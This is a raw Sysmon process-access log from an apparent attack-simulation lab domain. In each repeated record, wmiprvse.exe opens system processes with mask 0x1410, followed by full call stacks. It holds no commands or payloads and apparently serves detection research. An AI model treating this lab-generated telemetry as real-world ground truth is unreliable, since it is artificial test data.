15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026358Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026357Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026356Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026355Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026354Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026353Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026352Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026351Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026350Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.850{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026349Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026348Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026347Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026346Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026345Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026344Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026343Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026342Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026341Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026340Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026339Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 